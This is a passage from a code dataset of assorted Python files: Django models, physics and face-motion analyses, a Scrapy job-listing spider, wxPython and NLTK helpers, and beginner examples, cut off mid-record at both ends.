'CANCELADA'),\n\t\t\t('RECUSADA', 'RECUSADA')\n\n\t\t\t]\n\tdata = models.DateTimeField(auto_now_add=False, blank=True, null=True)\n\tmatricula= models.CharField(max_length=20, null=True, blank=True, unique=True)\n\t\n\taluno = models.ForeignKey(Aluno, blank=True, null=True, on_delete=models.CASCADE)\n\tturma= models.ForeignKey(Turma, blank=True, null=True, on_delete=models.CASCADE)\n\tturno = models.ForeignKey(Turno, blank=True, null=True, on_delete=models.CASCADE)\n\tanexos = models.FileField(upload_to = \"SistemaEscolar/doc\", blank = True, null= True)\n\tobservacao = models.TextField(blank=True, null=True)\n\tstatus = models.CharField(max_length=20, null=True, choices=status_choices, default='PENDENTE')\n\n\tdef __str__(self):\n\t\treturn self.matricula\n\nclass Observacao(models.Model):\n\tstatus_choices=[\n\t\t\t('PENDENTE', 'PENDENTE'),\n\t\t\t('CONCLUÍDA', 'CONCLUÍDA'),\n\t\t\t\n\t\t\t]\n\taluno = models.ForeignKey(Aluno, blank=True, null=True, on_delete=models.CASCADE)\n\tobservacao = models.TextField(blank=True, null=True)\n\tdata = models.DateTimeField(auto_now_add=True, blank=True, null=True)\n\tstatus = models.CharField(max_length=20, null=True, choices=status_choices, default='PENDENTE')\n\n\n\n\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t","sub_path":"SistemaEscolar/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"155426275","text":"# Charged particle trajectory under electric and magnetic fields\nfrom pylab import *\nfrom scipy import integrate\n\nm = 25.0\t# Mass and \nq = 5.0\t\t# Charge of the particle\nEx = 0.0\t# Electric Field vector\nEy = 0.0\nEz = 0.0\nBx = 0.0\t# Magnetic field vector\nBy = 0.0\nBz = 5.0\n\ndef solver(X, t0): # X contains x,y,z and dx,dy,dz , 6 elements\n\tvx = X[3]\n\tvy = X[4]\n\tvz = X[5]\n\tax = q * (Ex + (vy * Bz) - (vz * By) ) /m\t# Lorentz force / mass\n\tay = q * (Ey - (vx * Bz) + (vz * Bx) ) /m\n\taz = q * (Ez + (vx * By) - (vy * Bx) ) /m\n\treturn [vx, vy, vz, ax, ay, az ]\n\t\npv0 = [0,0,0, 0,1,0]\t\t# position & velocity at t = 0\nt = arange(0, 50, 0.01)\t\t# duration and steps\npv = integrate.odeint(solver, pv0, t)\t\t# integrate\n\nfrom mpl_toolkits.mplot3d import Axes3D\nax = Axes3D(figure())\nax.plot(pv[:,0], pv[:,1], pv[:,2])\t\t\t# 3d plot of x, y and z\nax.set_zlabel('Z axis')\nshow()\n\n\n","sub_path":"Documents/Examples/Lorentz-force-scipy.py","file_name":"Lorentz-force-scipy.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322748321","text":"def my_abs(x):\n\tif not isinstance(x,(int,float)):\n\t\traise TypeError('bad operand type');\n\tif x >=0 :\n\t\treturn x\n\telse:\n\t\treturn -x\n\nprint(my_abs(-99))\n\ndef nop():\n\tpass\n\"\"\"\npass语句什么都不做,那有什么用?\n实际上pass可以用来作为占位符,\n比如现在还没想好怎么写函数的代码,就可以先放一个pass,让代码能运行起来。\n\"\"\"\n\n#返回多个值\nimport math\n\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\nx, y = move(100, 100, 60, math.pi / 6)\nprint(x, y)\n\nr = move(100, 100, 60, math.pi / 6)\nprint(r)\n\ndef square(x):\n\t'Calculates the square of the number x.'\n\treturn x * x\n\nprint(square.__doc__)\n\nhelp(square)","sub_path":"python/python_base/函数/定义函数.py","file_name":"定义函数.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"136840129","text":"import yaml\nimport boids\nfrom copy import deepcopy\nbefore=deepcopy(boids.boid_data)\nboids.update_boids(boids.boid_data)\nafter=boids.boid_data\nfixture={\"before\":before,\"after\":after}\nfixture_file=open(\"fixture.yml\",'w')\nfixture_file.write(yaml.dump(fixture))\nfixture_file.close()\n","sub_path":"record_fixture.py","file_name":"record_fixture.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"353362374","text":"# -*- coding: utf-8 -*-\n\"\"\"\nTMP_Jobs spider created on the top of ATSSpider\n\nscrapy crawl tmp_jobs -a mining_job_id=9999 -a iteration=1 -a extract=1 -a url=\"https://www.jobs-ups.com/search-jobs\"\n\nSeed URL:\n https://www.jobs-ups.com/search-jobs\n https://jobs.aarons.com/search-jobs\n https://jobs.bd.com/search-jobs\n https://jobs.capitalone.com/search-jobs\n https://jobs.tenethealth.com/search-jobs\n https://jobs.chipotle.com/search-jobs\n\"\"\"\n\nfrom json import loads\nfrom re import compile\nfrom scrapy.http import Request, FormRequest\nfrom scrapy.selector import Selector\nfrom urlparse import urljoin, urlparse\nfrom urllib import urlencode\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import ConvertDateString, HtmlFormatter, Prefix, Replace\n\n\nclass TMP_Jobs(ATSSpider):\n\n name = 'tmp_jobs'\n ref_id = compile(r'\\/?-?(\\d+)$')\n rec_per_page = 15\n company_xpath = []\n company = ''\n logo_url = ''\n page = 1\n max_page = 0\n\n def __init__(self, *args, **kwargs):\n super(TMP_Jobs, self).__init__(*args, **kwargs)\n if 'url' in kwargs:\n url_parsed = urlparse(kwargs['url']).netloc.split('.')\n if url_parsed:\n self.company = url_parsed[1]\n\n def parse(self, response):\n try:\n jsonResponse = loads(response.body.decode('utf-8'))\n sel = Selector(text=jsonResponse.get('results'), type='html')\n except:\n sel = Selector(response)\n\n if not self.expected_job_count_set:\n expected_count = sel.xpath(\n '//section/h1[@role=\"status\"]/text()'\n ).extract()\n if expected_count:\n self.expected_job_count = expected_count\n\n max_page = sel.xpath(\n '//div[@class=\"pagination-page-count\"]/input[@id=\"pagination-current-bottom\"]/@max'\n ).extract()\n if max_page:\n self.max_page = int(max_page[0])\n\n if not self.logo_url:\n self.logo_url = sel.xpath(\n '//a[@class=\"logo\"]/img/@src |'\n '//h1/a/img[contains(@src, \"logo\")]/@src'\n ).extract()\n if self.logo_url:\n if not urlparse(self.logo_url[0]).scheme:\n self.logo_url = 'http:%s' % self.logo_url[0]\n\n for li in sel.xpath(\n '//section[@id=\"search-results-list\"]//ul/li |'\n '//section[@id=\"search-results\"]//ul/li'\n ):\n href = li.xpath('./a/@href').extract()\n if href:\n yield Request(\n callback=self.parse_job_callback(),\n meta={\n 'location': li.xpath(\n './a/*[@class=\"job-location\"]/text() |'\n './span[@class=\"job-location\"]/text()'\n ).extract(),\n },\n url=urljoin(response.url, href[0]),\n )\n\n # pagination\n if self.page < self.max_page:\n self.page += 1\n params = {\n \"ActiveFacetID\": \"0\",\n \"CurrentPage\": str(self.page),\n \"RecordsPerPage\": \"%s\" % self.rec_per_page,\n \"Distance\": \"\",\n \"Keywords\": \"\",\n \"Location\": \"\",\n \"Latitude\": \"null\",\n \"Longitude\": \"null\",\n \"ShowRadius\": \"False\",\n \"FacetTerm\": \"\",\n \"FacetType\": \"0\",\n \"FacetFilters\": \"[]\",\n \"SearchResultsModuleName\": \"Search Results\",\n \"SearchFiltersModuleName\": \"Search Filters\",\n \"SortCriteria\": \"0\",\n \"SortDirection\": \"0\",\n \"SearchType\": \"5\",\n \"CategoryFacetTerm\": \"null\",\n \"CategoryFacetType\": \"null\",\n \"LocationFacetTerm\": \"null\",\n \"LocationFacetType\": \"null\",\n \"KeywordType\": \"null\",\n \"LocationType\": \"null\",\n \"LocationPath\": \"null\",\n \"OrganizationIds\": \"null\",\n }\n yield Request(\n callback=self.parse,\n headers={'X-Requested-With': 'XMLHttpRequest'},\n url=urljoin(response.url, '/search-jobs/results?%s' % urlencode(params))\n )\n\n def parse_job(self, response):\n sel = Selector(response)\n\n description_xpaths = [\n [\n '//tr/td[text()=\"Job Description\"]',\n '//tr[td[text()=\"Job Description\"]]/following-sibling::tr[1]'\n ],\n '//section/div[@itemprop=\"description\"]',\n '//div/div[@itemprop=\"description\"]',\n '//div[@class=\"job\"]',\n ]\n loader = BrightcorpItemLoader(selector=sel)\n loader.add_xpath(\n 'title',\n '//section[@class=\"job-description\"]/h1[@itemprop=\"title\"]/text() |'\n '//*[@itemprop=\"title\"]/text()'\n )\n loader.add_xpath(\n 'jobcategory',\n '//div/b[contains(text(), \"job\")]/../text() |'\n '//div/h2/span[contains(text(), \"Job\")]/../following-sibling::span/text() |'\n '//div/strong/span[contains(text(), \"Job\")]/../following-sibling::span/text()'\n )\n if not loader.get_output_value('jobcategory'):\n loader.add_xpath(\n 'jobcategory',\n '//tr/td[contains(text(), \"Job Category\")]/../following-sibling::tr[1]/td/text() |'\n '//*/text()[contains(., \"Area of Expertise:\")]',\n Replace('Area of Expertise:')\n )\n loader.add_xpath(\n 'jobtype',\n '//div/b[contains(text(), \"Schedule\")]/../text() |'\n '//div/strong/span[contains(text(), \"Schedule\")]/../following-sibling::span/text()'\n )\n if not loader.get_output_value('jobtype'):\n loader.add_xpath(\n 'jobtype',\n '//tr/td[contains(text(), \"Employment Status\")]/../following-sibling::tr[1]/td/text() |'\n '//*/text()[contains(., \"Contract:\")]',\n Replace('Contract:')\n )\n loader.add_value(\n 'location', response.meta.get('location')\n )\n loader.add_xpath(\n 'expiration_date',\n '//*/text()[contains(., \"Vacancy Closing:\")]',\n Replace('Vacancy Closing:'), ConvertDateString('%d/%m/%Y')\n )\n loader.add_xpath(\n 'date',\n '//section//span[@itemprop=\"datePosted\"]/text() |'\n '//ul/li[@itemprop=\"datePosted\"]/text()',\n ConvertDateString('%m/%d/%Y')\n )\n if not loader.get_output_value('date'):\n loader.add_xpath(\n 'date', '//*/text()[contains(., \"Date Live:\")]',\n Replace('Date Live:'), ConvertDateString('%d/%m/%Y')\n )\n loader.add_xpath('company', self.company_xpath)\n for description_xpath in description_xpaths:\n loader.add_xpath(\n 'description',\n description_xpath,\n HtmlFormatter()\n )\n if loader.get_output_value('description'):\n break\n loader.add_value(\n 'referencenumber',\n response.url,\n Prefix('%s-%s-' % (self.name, self.company)),\n re=self.ref_id\n )\n loader.add_value('url', response.url)\n loader.add_value('apply_url', response.url)\n loader.add_value(\n 'logo_url',\n self.logo_url\n )\n\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/tmp_jobs.py","file_name":"tmp_jobs.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29045116","text":"import wx\nfrom pprint import pprint as pp\nclass DataControl(object):\n\tct = {}\n\tdef __init__(self):\n\t\tself.ct[self.__class__.__name__]=[]\n\tdef getc(self, ctrl):\n\t\tself.ct[self.__class__.__name__].append(ctrl)\n\t\treturn ctrl\t\nclass DataPanel(wx.Panel, DataControl):\n\t\"\"\" \"\"\"\n\tsize=(400,400)\n\t\n\n\tdef __init__(self, *args, **kwargs):\n\t\tDataControl.__init__(self)\n\t\tif not 'size' in kwargs: kwargs['size'] = self.size\n\t\tvalue= kwargs.get('value','N/A')\n\t\tdel kwargs['value']\n\t\twx.Panel.__init__(self, *args, **kwargs)\n\t\tcontrol = self.getc(wx.TextCtrl(self, style=wx.TE_MULTILINE, value=value))\n\t\ttry:\n\t\t\ta=1/0\n\t\texcept Exception as ex:\n\t\t\twx.MessageBox(str(ex))\n\t\t\tfor obj in self.ct[self.__class__.__name__]:\n\t\t\t\tobj.Destroy()\n\t\t\traise\n\t\t\n\t\tif 1:\n\t\t\tsizer = wx.BoxSizer(wx.VERTICAL)\n\t\t\tsizer.Add(control, 1, wx.EXPAND|wx.ALL, 40) \n\n\t\t\tself.SetSizer(sizer)\n\t\t\tself.SetAutoLayout(True)\n\t\t\tsizer.Fit(self)\n\t\t\t\n\t\t#self.Show(True)\n\t\t\n\n\t\ndef runTest(**kwargs):\n\twin = DataPanel(**kwargs)\n\treturn win\n\n#----------------------------------------------------------------------\n\n\n\noverview = \"\"\"\n

TreeListCtrl

\n\nThe TreeListCtrl is essentially a wx.TreeCtrl with extra columns,\nsuch that the look is similar to a wx.ListCtrl.\n\n\n\"\"\"\n\n\nif __name__ == '__main__':\n\t#raw_input(\"Press enter...\")\n\timport sys,os\n\tfrom misc import run\n\n\trun.main(['', os.path.basename(sys.argv[0])] + sys.argv[1:])\t\t","sub_path":"_misc/_editor/DataPanel.py","file_name":"DataPanel.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"433390203","text":"from django import template\nfrom meta import cfr_section\n\nregister = template.Library()\n\n\ndef find_tag(root, tag):\n for child in [c for c in root['children'] if isinstance(c, dict)]:\n if child['tag'] == tag:\n return child\n elif isinstance(child, dict):\n find_tag(child, root)\n\n\n@register.simple_tag\ndef entry_url(entry, meta):\n\n version_and_eff_date = meta['node_id'].split(':')[0:2]\n\n app_letter = find_tag(entry, 'appendixLetter')\n if app_letter is None:\n link = '/'.join(['regulation'] + version_and_eff_date + [entry['attributes']['target']])\n elif app_letter['children'][0] == 'Interp':\n link = '/'.join(['interpretations'] + version_and_eff_date + [entry['attributes']['target']])\n else:\n link = '/'.join(['regulation'] + version_and_eff_date + [entry['attributes']['target']])\n return '/' + link","sub_path":"eregs_core/templatetags/toc.py","file_name":"toc.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"365760348","text":"def max_of_sub(arr, n, k):\n\tmax = 0\n\n\tfor i in range(n - k + 1):\n\t\tmax = arr[i]\n\t\t\n\t\tfor j in range(1, k):\n\t\t\tif(arr[i + j] > max):\n\t\t\t\tmax = arr[i + j]\n\t\t\n\t\tprint(str(max), end = \" \")\n\narr = [int(item) for item in input(\"Enter the array items: \").split()]\nn = len(arr)\nk = int(input('Enter the size of sub-array: '))\nmax_of_sub(arr, n, k)\n","sub_path":"14. Sliding Window Max.py","file_name":"14. Sliding Window Max.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"495278340","text":"import os\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport nltk\nfrom nltk.util import ngrams\n\n\ndef remove_unicode(file_in, file_out):\n\t'''\n\tRemoves lines containing unicode characters from a file.\n\tThe file is left intact. \n\t'''\n\tfile_in = open(file_in, 'r')\n\tfile_out = open(file_out, 'w')\n\n\tfor line in file_in:\n\t\ttry:\n\t\t\tfile_out.write(line.encode('ASCII'))\n\t\texcept UnicodeDecodeError:\n\t\t\tpass\n\n\tfile_in.close()\n\tfile_out.close()\n\n\ndef clean_token(t):\n\t'''\n\tInput parameter is a token (list). The token is cleaned from punctuation \n\tand bad words (profanity filter). \n\t'''\n\tpunctuation_list = ['.', ',', '...', \"''\", '~', ';', '+', '_', '/', '//', \"\\\\\", \n\t\t\"-/\", '[', ']', '{', '}', '..', '.-' '``', '(', ')', ':', '?', '!', '-', \n\t\t'--', '&', '%', '*', '$', '#', '@', '>', '<', '=', '-__-', '-_-', '^_^', '-.-', '|']\n\tclean_list = [x for x in t if x not in punctuation_list]\n\treturn clean_list\n\n\ndef tokenize_file(file_in, file_out):\n\t'''\n\tOpens a file and reads it line by line and tokenizes it. \n\tThe exception handles non-ascii characters.\n\tIn the output file each word/letter/character is well-separated by\n\ta whitespace.\n\t'''\n\tfile_in = open(file_in, 'r')\n\tfile_out = open(file_out, 'w')\n\n\tfor line in file_in:\n\t\ttemp_token = nltk.word_tokenize(line)\n\t\tfor item in temp_token:\n\t\t\tfile_out.write(\"%s \" % item)\n\t\tfile_out.write(\"\\n\")\n\t\n\tfile_out.close()\n\tfile_in.close()\n\n\ndef get_ngram(file_in, file_out, n):\n\t'''\n\tGiven a cleaned, tokenized file, this function creates a new file containing\n\tthe n grams and their frequencies. The result is produced in a data.frame to \n\timport it in R.\n\t'''\n\tfile_in = open(file_in, 'r')\n\tfile_out = open(file_out, 'w')\n\tngram_dict = {}\n\n\tif n == 1:\n\t\tfor line in file_in:\n\t\t for item in nltk.word_tokenize(line):\n\t\t\t ngram_dict[item] = ngram_dict.get(item, 0) + 1\n\telse:\n\t\tfor line in file_in:\n\t\t for item in list(ngrams(nltk.word_tokenize(line) , n)):\n\t\t\t bigram_dict[item] = ngram_dict.get(item, 0) + 1\n\n\ttemp_df = pd.Series(single_gram_dict)\n\ttemp_df.to_csv(file_out)\n\tfile_out.close()\n\tfile_in.close()\n","sub_path":"capstone.py","file_name":"capstone.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"449084478","text":"# coding: utf-8\n\nfrom utg import relations as r\n\n\ndef get_property_relations():\n return [relation\n for relation in r.__dict__.itervalues()\n if relation != r.WORD_PROPERTY and isinstance(relation, type) and issubclass(relation, r.WORD_PROPERTY)]\n\n\ndef get_default_properties():\n values = {}\n\n for relation in get_property_relations():\n values[relation] = relation.records[0]\n\n values[r.WORD_TYPE] = None\n\n return values\n\ndef get_verbose_to_relations():\n values = {}\n\n for relation in get_property_relations():\n for record in relation.records:\n values[record.verbose_id] = record\n\n return values\n\n\ndef _keys_generator(left, right, restrictions):\n from utg.data import PRESETS\n\n if not right:\n yield []\n return\n\n central, right = right[0], right[1:]\n\n # if property is in preset\n for preset_owner, preset_slave in PRESETS.iteritems():\n if preset_slave._relation == central and preset_owner in left:\n for tail in _keys_generator(left + [preset_slave], right, restrictions):\n yield [preset_slave] + tail\n return\n\n # if property in restrictions\n for used_property in left:\n if used_property in restrictions and central in restrictions[used_property]:\n for tail in _keys_generator(left + [None], right, restrictions):\n yield [None] + tail\n return\n\n for record in central.records:\n for tail in _keys_generator(left + [record], right, restrictions):\n yield [record] + tail\n\n return\n\n\ndef _get_cache(schema, restrictions):\n cache = {}\n inverted_cache = []\n\n for i, key in enumerate(_keys_generator([], schema, restrictions=restrictions)):\n cache[tuple(key)] = i\n inverted_cache.append(tuple(key))\n\n return cache, inverted_cache\n\n\ndef _populate_key_with_presets(key, schema):\n from utg.data import PRESETS\n\n replaces = {}\n\n for property in key:\n if property not in PRESETS:\n continue\n\n replace = PRESETS[property]\n replaces[replace._relation] = replace\n\n if not replaces:\n return\n\n for index, property_group in enumerate(schema):\n if property_group in replaces:\n key[index] = replaces[property_group]\n\n\ndef get_caches(restrictions):\n\n caches = {}\n inverted_caches = {}\n\n for word_type in r.WORD_TYPE.records:\n cache, inverted_cache = _get_cache(word_type.schema, restrictions[word_type])\n\n caches[word_type] = cache\n inverted_caches[word_type] = inverted_cache\n\n\n return caches, inverted_caches\n\n\ndef get_nearest_key(key, available_keys):\n best_key = None\n best_similarity = -1\n\n for available_key in available_keys:\n current_similarity = 0\n for index, (key_property, available_key_property) in enumerate(zip(key, available_key)):\n if key_property == available_key_property:\n current_similarity += (1 + 0.01 * index) # first elements in schema has less priority\n\n if current_similarity > best_similarity:\n best_similarity = current_similarity\n best_key = available_key\n\n return best_key\n\n\ndef _raw_keys_generator(left, key, schema):\n from utg.data import PRESETS\n\n if not key:\n yield []\n return\n\n schema_head, schema_tail = schema[0], schema[1:]\n key_head, key_tail = key[0], key[1:]\n\n # if head is in preset\n for preset_owner, preset_slave in PRESETS.iteritems():\n if preset_slave == key_head and preset_owner in left:\n key_head = None\n break\n\n\n if key_head is not None:\n for tail in _raw_keys_generator(left + [key_head], key_tail, schema_tail):\n yield [key_head] + tail\n return\n\n for head in schema_head.records:\n for tail in _raw_keys_generator(left + [head], key_tail, schema_tail):\n yield [head] + tail\n\n return\n\n\ndef _get_raw_cache(keys, schema):\n cache = {}\n\n for index, key in enumerate(keys):\n for raw_key in _raw_keys_generator([], key, schema):\n cache[tuple(raw_key)] = index\n\n return cache\n\n\ndef get_raw_caches(inverted_caches):\n caches = {}\n\n for word_type in r.WORD_TYPE.records:\n cache = _get_raw_cache(inverted_caches[word_type], word_type.schema)\n\n caches[word_type] = cache\n\n return caches\n\n\ndef pretty_format_current_keys_cache():\n import pprint\n\n from utg import data\n\n return pprint.pformat(data.WORDS_CACHES)\n","sub_path":"utg/logic.py","file_name":"logic.py","file_ext":"py","file_size_in_byte":4523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"503490781","text":"import os\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nfrom sklearn.decomposition import TruncatedSVD\n\ndef get_face_data(video_file, face_pixels):\n\n # Open Video File\n cap = cv2.VideoCapture(video_file)\n frameCount = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n frameWidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\n frameHeight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\n\n # Extract Selected Frames\n face_data = []\n for frame_index in range(frameCount):\n ret, frame = cap.read()\n frame = frame[:, :, 0]\n\n face_frame = []\n for pixel in face_pixels:\n face_frame.append(frame[pixel[0], pixel[1]])\n\n face_data.append(face_frame)\n frame_index += 1\n\n cap.release()\n face_data = np.array(face_data)\n return face_data, frameHeight, frameWidth\n\n\ndef get_bodycam_filename(base_directory):\n file_list = os.listdir(base_directory)\n for file_name in file_list:\n if \"_cam_1.mp4\" in file_name:\n return file_name\n\n\ndef view_whisker_activity(whisker_data, whisker_pixels, frame_height, frame_width):\n\n number_of_frames = len(whisker_data)\n number_of_whisker_pixels = np.shape(whisker_pixels)[0]\n\n whisker_y_min = np.min(whisker_pixels[:, 0])\n whisker_y_max = np.max(whisker_pixels[:, 0])\n whisker_x_min = np.min(whisker_pixels[:, 1])\n whisker_x_max = np.max(whisker_pixels[:, 1])\n\n plt.ion()\n for frame_index in range(number_of_frames):\n template = np.zeros((frame_height, frame_width))\n for pixel_index in range(number_of_whisker_pixels):\n pixel_value = whisker_data[frame_index, pixel_index]\n template[whisker_pixels[pixel_index, 0], whisker_pixels[pixel_index, 1]] = pixel_value\n\n plt.imshow(template[whisker_y_min:whisker_y_max, whisker_x_min:whisker_x_max], vmin=0, vmax=50)\n plt.draw()\n plt.pause(0.1)\n plt.clf()\n\ndef match_whisker_motion_to_widefield_motion(base_directory, transformed_whisker_data):\n\n print(\"Matching\")\n\n # Load Widefield To Mousecam Frame Dict\n widefield_to_mousecam_frame_dict = np.load(os.path.join(base_directory, \"Stimuli_Onsets\", \"widfield_to_mousecam_frame_dict.npy\"), allow_pickle=True)[()]\n widefield_frame_list = list(widefield_to_mousecam_frame_dict.keys())\n number_of_mousecam_frames = np.shape(transformed_whisker_data)[0]\n\n print(\"Widefield Frames\", len(widefield_frame_list))\n print(\"Mousecam Frames\", number_of_mousecam_frames)\n print(\"Minimum Matched Mousecam Frame\", np.min(list(widefield_to_mousecam_frame_dict.values())))\n print(\"Maximum Matched Mousecam Frame\", np.max(list(widefield_to_mousecam_frame_dict.values())))\n print(\"Transformed Whisker Data Shape\", np.shape(transformed_whisker_data))\n\n # Match Whisker Activity To Widefield Frames\n matched_whisker_data = []\n for widefield_frame in widefield_frame_list:\n corresponding_mousecam_frame = widefield_to_mousecam_frame_dict[widefield_frame]\n if corresponding_mousecam_frame < number_of_mousecam_frames:\n matched_whisker_data.append(transformed_whisker_data[corresponding_mousecam_frame])\n else:\n print(\"unmatched, mousecam frame: \", corresponding_mousecam_frame)\n matched_whisker_data = np.array(matched_whisker_data)\n return matched_whisker_data\n\n\ndef plot_cumulative_explained_variance(explained_variance, save_directory):\n cumulative_variance = np.cumsum(explained_variance)\n x_values = list(range(1, len(cumulative_variance)+1))\n plt.title(\"Cumulative Explained Variance, Face Movement PCA\")\n plt.plot(x_values, cumulative_variance)\n plt.ylim([0, 1.1])\n plt.savefig(os.path.join(save_directory, \"Face_Cumulative_Explained_Variance.png\"))\n plt.close()\n\n\ndef decompose_face_motion(base_directory):\n\n # Load Whisker Pixels\n face_pixels = np.load(os.path.join(base_directory, \"Mousecam_Analysis\", \"Face_Pixels.npy\"))\n face_pixels = np.transpose(face_pixels)\n\n # Get Bodycam Filename\n bodycam_filename = get_bodycam_filename(base_directory)\n bodycam_file = os.path.join(base_directory, bodycam_filename)\n\n # Get Whisker Data\n face_data, frame_height, frame_width = get_face_data(bodycam_file, face_pixels)\n face_data = np.ndarray.astype(face_data, float)\n\n # Get Whisker Motion Energy\n face_motion_energy = np.diff(face_data, axis=0)\n face_motion_energy = np.abs(face_motion_energy)\n\n # Peform SVD on this\n model = TruncatedSVD(n_components=500)\n model.fit(face_motion_energy)\n\n # Get Explained Variance\n explained_variance = model.explained_variance_ratio_\n\n # Save This\n np.save(os.path.join(base_directory, \"Mousecam_Analysis\", \"Explained_Variance_200.npy\"), explained_variance)\n return explained_variance\n\n\n\ndef calculate_dimensionality(session_list):\n\n # Create Figure\n figure_1 = plt.figure()\n individual_axis = figure_1.add_subplot(1,2,1)\n cumulative_axis = figure_1.add_subplot(1,2,2)\n\n for base_directory in tqdm(session_list):\n explained_variance = decompose_face_motion(os.path.join(\"/media/matthew/Expansion/Control_Data\", base_directory))\n\n individual_axis.plot(explained_variance)\n cumulative_axis.plot(np.cumsum(explained_variance))\n\n plt.show()\n\n\ndef estimate_average_dimensionality(session_list):\n\n dimensionality_list = []\n for base_directory in tqdm(session_list):\n explained_variance = np.load(os.path.join(\"/media/matthew/Expansion/Control_Data\",base_directory, \"Mousecam_Analysis\", \"Explained_Variance_200.npy\"))\n dimensionality_list.append(explained_variance)\n\n dimensionality_list = np.array(dimensionality_list)\n dimensionality_list = np.cumsum(dimensionality_list, axis=1)\n mean_dimensionality = np.mean(dimensionality_list, axis=0)\n dimensionality_sd = np.std(mean_dimensionality, axis=0)\n\n\n eighty_counter = 1\n for x in range(500):\n if mean_dimensionality[x] > 0.8:\n print(\"80% Of Variance Explained By: \", eighty_counter, \"Components\")\n else:\n eighty_counter += 1\n\n ninety_counter = 1\n for x in range(500):\n if mean_dimensionality[x] > 0.9:\n print(\"90% Of Variance Explained By: \", ninety_counter, \"Components\")\n else:\n ninety_counter += 1\n\n print(\"next 100 components\", mean_dimensionality[eighty_counter-1 + 100])\n\n x_values = list(range(len(mean_dimensionality)))\n x_values = np.add(x_values, 1)\n plt.plot(x_values, mean_dimensionality)\n\n sd_upper_bound = np.add(mean_dimensionality, dimensionality_sd)\n sd_lower_bound = np.subtract(mean_dimensionality, dimensionality_sd)\n plt.fill_between(x_values, sd_lower_bound, sd_upper_bound, alpha=0.1)\n\n plt.show()\n\n\n# Select Sessions\nselected_session_list = [\n\n r\"NRXN78.1A/2020_12_05_Switching_Imaging\",\n r\"NRXN78.1A/2020_12_09_Switching_Imaging\",\n\n r\"NRXN78.1D/2020_11_29_Switching_Imaging\",\n r\"NRXN78.1D/2020_12_05_Switching_Imaging\",\n\n r\"NXAK14.1A/2021_05_21_Switching_Imaging\",\n r\"NXAK14.1A/2021_05_23_Switching_Imaging\",\n r\"NXAK14.1A/2021_06_11_Switching_Imaging\",\n r\"NXAK14.1A/2021_06_13_Transition_Imaging\",\n r\"NXAK14.1A/2021_06_15_Transition_Imaging\",\n r\"NXAK14.1A/2021_06_17_Transition_Imaging\",\n\n r\"NXAK22.1A/2021_10_14_Switching_Imaging\",\n r\"NXAK22.1A/2021_10_20_Switching_Imaging\",\n r\"NXAK22.1A/2021_10_22_Switching_Imaging\",\n r\"NXAK22.1A/2021_10_29_Transition_Imaging\",\n r\"NXAK22.1A/2021_11_03_Transition_Imaging\",\n r\"NXAK22.1A/2021_11_05_Transition_Imaging\",\n\n r\"NXAK4.1B/2021_03_02_Switching_Imaging\",\n r\"NXAK4.1B/2021_03_04_Switching_Imaging\",\n r\"NXAK4.1B/2021_03_06_Switching_Imaging\",\n r\"NXAK4.1B/2021_04_02_Transition_Imaging\",\n r\"NXAK4.1B/2021_04_08_Transition_Imaging\",\n r\"NXAK4.1B/2021_04_10_Transition_Imaging\",\n\n r\"NXAK7.1B/2021_02_26_Switching_Imaging\",\n r\"NXAK7.1B/2021_02_28_Switching_Imaging\",\n r\"NXAK7.1B/2021_03_02_Switching_Imaging\",\n r\"NXAK7.1B/2021_03_23_Transition_Imaging\",\n r\"NXAK7.1B/2021_03_31_Transition_Imaging\",\n r\"NXAK7.1B/2021_04_02_Transition_Imaging\",\n\n]\n\n#calculate_dimensionality(selected_session_list)\nestimate_average_dimensionality(selected_session_list)\n","sub_path":"Ridge_Regression_Model/Estimate_Face_Movement_Dimensionality.py","file_name":"Estimate_Face_Movement_Dimensionality.py","file_ext":"py","file_size_in_byte":8228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"97007213","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n Created on August 18, 2020\r\n\r\n@author: joseph-hellerstein\r\n\r\nCore logic of model fitter. Does not include plots.\r\n\"\"\"\r\n\r\nfrom SBstoat.namedTimeseries import NamedTimeseries, TIME, mkNamedTimeseries\r\nfrom SBstoat.logs import Logger\r\nimport SBstoat.timeseriesPlotter as tp\r\nfrom SBstoat import rpickle\r\n\r\nimport collections\r\nimport copy\r\nimport lmfit\r\nimport numpy as np\r\nimport tellurium as te\r\nimport typing\r\n\r\n# Constants\r\nPARAMETER_LOWER_BOUND = 0\r\nPARAMETER_UPPER_BOUND = 10\r\n# Minimizer methods\r\nMETHOD_DIFFERENTIAL_EVOLUTION = 